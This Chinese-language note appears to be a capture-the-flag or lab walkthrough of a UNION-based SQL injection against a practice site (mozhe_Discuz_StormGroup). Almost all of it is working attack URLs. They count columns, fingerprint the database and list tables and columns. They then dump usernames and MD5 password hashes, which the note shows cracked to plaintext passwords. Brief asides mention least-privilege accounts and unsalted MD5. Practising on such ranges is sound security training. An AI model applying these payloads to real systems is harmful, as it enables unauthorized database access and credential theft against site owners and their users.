判断注入
#猜解列数(字段数)
依次尝试 order by 1、2、3、4……
order by 4 正常、order by 5 报错,说明共有 4 个字段
http://219.153.49.228:48400/new_list.php?id=1 union select 1,2,3,4
#报错猜解准备
将 id=1 改为 id=-1,或改为 id=1 and 2=222(条件恒假),使原查询不返回记录,页面只显示 union select 的结果
http://219.153.49.228:48400/new_list.php?id=-1%20union%20select%201,2,3,4
或
http://219.153.49.228:48400/new_list.php?id=1%20and%202=2222%20union%20select%201,2,3,4
#信息收集
数据库版本:version() 5.7.22-0ubuntu0.16.04.1
数据库名字:database() mozhe_Discuz_StormGroup
数据库用户:user() root@localhost(Web 应用以 root 账号连接数据库,注入的影响范围不再限于当前库;应改用仅授予所需权限的专用账号)
操作系统:@@version_compile_os Linux
#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询所有:
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
#查询指定表名StormGroup_member下的列名信息
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
#查询指定数据
#有多条记录时,可改变 limit x,1 中的 x 逐条猜解
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
mozhe
356f589a7df439f6f744ff19bb8092c0 MD5 查表还原(MD5 是单向哈希而非加密;此处应为未加盐的 MD5,故可直接反查) dsan13
http://219.153.49.228:48400/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1
mozhe
a26f03bdd67bc4a815c2c30c6daf0ce3 MD5 查表还原(单向哈希,并非加密) 959003